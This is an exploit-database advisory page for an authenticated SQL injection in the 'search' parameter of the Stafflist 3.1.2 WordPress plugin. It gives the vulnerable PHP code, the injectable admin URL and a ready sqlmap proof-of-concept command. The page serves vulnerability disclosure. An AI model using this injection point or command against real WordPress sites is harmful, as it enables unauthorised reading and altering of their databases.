WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)

vendor:

Stafflist

by:

Hassan Khan Yusufzai - Splint3r7

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Stafflist

Affected Version From: 3.1.2002

Affected Version To: 3.1.2002

Patch Exists: NO

Related CWE:

CPE: a:wordpress:stafflist:3.1.2

Metasploit:

Other Scripts:

Platforms Tested: Firefox

2022

WordPress Plugin stafflist 3.1.2 – SQLi (Authenticated)

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'search' parameter of the 'admin.php' script when processing a search request. A remote authenticated attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. All input data should be carefully verified before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
	$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
			LOWER(firstname) LIKE '%{$w}%' OR
			LOWER(department)  LIKE '%{$w}%' OR
			LOWER(email) LIKE '%{$w}%'" : "");


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib